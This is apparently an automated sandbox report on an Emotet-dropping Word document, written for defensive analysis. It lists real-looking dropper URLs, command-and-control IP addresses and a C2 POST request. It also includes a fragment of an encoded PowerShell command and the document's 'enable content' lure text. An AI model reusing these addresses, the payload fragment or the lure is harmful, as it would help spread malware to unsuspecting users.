HMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://bbjugueteria.com/s6kscx/Z/Avira URL Cloud: Label: malware
                      Source: http://coworkingplus.es/wp-admin/FxmME/Avira URL Cloud: Label: malware
                      Source: http://coworkingplus.esAvira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/fz/Avira URL Cloud: Label: malware
                      Source: https://www.bimception.com/wp-admin/sHy5t/Avira URL Cloud: Label: malware
                      Source: http://silkonbusiness.matrixinfotechsolution.com/js/q26/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.comAvira URL Cloud: Label: malware
                      Source: http://silkonbusiness.matrixinfotechsolution.comAvira URL Cloud: Label: malware
                      Source: http://homecass.com/wp-content/iF/PAvira URL Cloud: Label: malware
                      Source: http://homecass.com/wp-content/iF/Avira URL Cloud: Label: malware
                      Source: http://alugrama.com.mx/t/2/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: armakonarms.comVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: INFO.docVirustotal: Detection: 33%Perma Link
                      Source: INFO.docMetadefender: Detection: 35%Perma Link
                      Source: INFO.docReversingLabs: Detection: 26%

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2093674985.0000000002AF0000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: global trafficDNS query: name: coworkingplus.es
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.241.60.240:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.138.213:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in memory: http://coworkingplus.es/wp-admin/FxmME/!http://silkonbusiness.matrixinfotechsolution.com/js/q26/!https://bbjugueteria.com/s6kscx/Z/!https://www.bimception.com/wp-admin/sHy5t/!http://armakonarms.com/wp-includes/fz/!http://alugrama.com.mx/t/2/!http://homecass.com/wp-content/iF/
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 195.159.28.230:8080
                      Source: global trafficHTTP traffic detected: GET /wp-admin/FxmME/ HTTP/1.1Host: coworkingplus.esConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/q26/ HTTP/1.1Host: silkonbusiness.matrixinfotechsolution.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/fz/ HTTP/1.1Host: armakonarms.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 69.38.130.14 69.38.130.14
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewASN Name: ASN-CATCHCOMNO ASN-CATCHCOMNO
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: global trafficHTTP traffic detected: POST /u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/ HTTP/1.1DNT: 0Referer: 195.159.28.230/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/Content-Type: multipart/form-data; boundary=----------------------zKAKAug7sQGRsm0tnrHdM1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.159.28.230:8080Content-Length: 5540Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731F7BDD-FA20-48C4-87C4-17800DB89026}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-admin/FxmME/ HTTP/1.1Host: coworkingplus.esConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/q26/ HTTP/1.1Host: silkonbusiness.matrixinfotechsolution.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/fz/ HTTP/1.1Host: armakonarms.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: coworkingplus.es
                      Source: unknownHTTP traffic detected: POST /u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/ HTTP/1.1DNT: 0Referer: 195.159.28.230/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/Content-Type: multipart/form-data; boundary=----------------------zKAKAug7sQGRsm0tnrHdM1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.159.28.230:8080Content-Length: 5540Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Jan 2021 12:39:16 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: http://alugrama.com.mx/t/2/
                      Source: powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/fz/
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: http://coworkingplus.es
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: http://coworkingplus.es/wp-admin/FxmME/
                      Source: powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: http://homecass.com/wp-content/iF/
                      Source: powershell.exe, 00000005.00000002.2094020711.0000000002DF4000.00000004.00000001.sdmpString found in binary or memory: http://homecass.com/wp-content/iF/P
                      Source: rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000002.2093216776.00000000023B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114289434.00000000027D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmpString found in binary or memory: http://silkonbusiness.matrixinfotechsolu
                      Source: powershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmpString found in binary or memory: http://silkonbusiness.matrixinfotechsolution.com
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: http://silkonbusiness.matrixinfotechsolution.com/js/q26/
                      Source: rundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2093216776.00000000023B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114289434.00000000027D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2090680205.00000000001C4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2090680205.00000000001C4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmpString found in binary or memory: https://bbjugueteria.com
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: https://bbjugueteria.com/s6kscx/Z/
                      Source: powershell.exe, 00000005.00000002.2098373151.0000000003D06000.00000004.00000001.sdmpString found in binary or memory: https://bbjugueteria.comh
                      Source: powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: powershell.exe, 00000005.00000002.2098378692.0000000003D0B000.00000004.00000001.sdmpString found in binary or memory: https://www.bimception.com
                      Source: powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmpString found in binary or memory: https://www.bimception.com/wp-admin/sHy5t/
                      Source: powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpString found in binary or memory: https://www.bimception.comh
                      Source: powershell.exe, 00000005.00000002.2098332140.0000000003C7E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2113549024.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2123339355.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2336227694.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2123303691.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2101787109.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2336212841.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2101808244.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2337739921.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2114619642.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2113562513.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2123952907.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words: 8,236 , ,3 , N@m 1
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5329
                      Source: unknownProcess created: Commandline size = 5228
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5228Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jqqmr\Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00252E055_2_000007FF00252E05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B0D57_2_1001B0D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DBB27_2_1000DBB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100146027_2_10014602
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100028147_2_10002814
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001821E7_2_1001821E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018A247_2_10018A24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DA277_2_1001DA27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A82A7_2_1000A82A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B22A7_2_1000B22A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000422B7_2_1000422B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A02C7_2_1001A02C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A82C7_2_1001A82C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E42E7_2_1000E42E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BA467_2_1000BA46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F2497_2_1000F249
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018C4D7_2_10018C4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001505A7_2_1001505A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100016627_2_10001662
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100016647_2_10001664
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D87D7_2_1001D87D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100100827_2_10010082
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E6897_2_1001E689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100184897_2_10018489
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002C937_2_10002C93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100114947_2_10011494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000AE9E7_2_1000AE9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026A07_2_100026A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008EA17_2_10008EA1
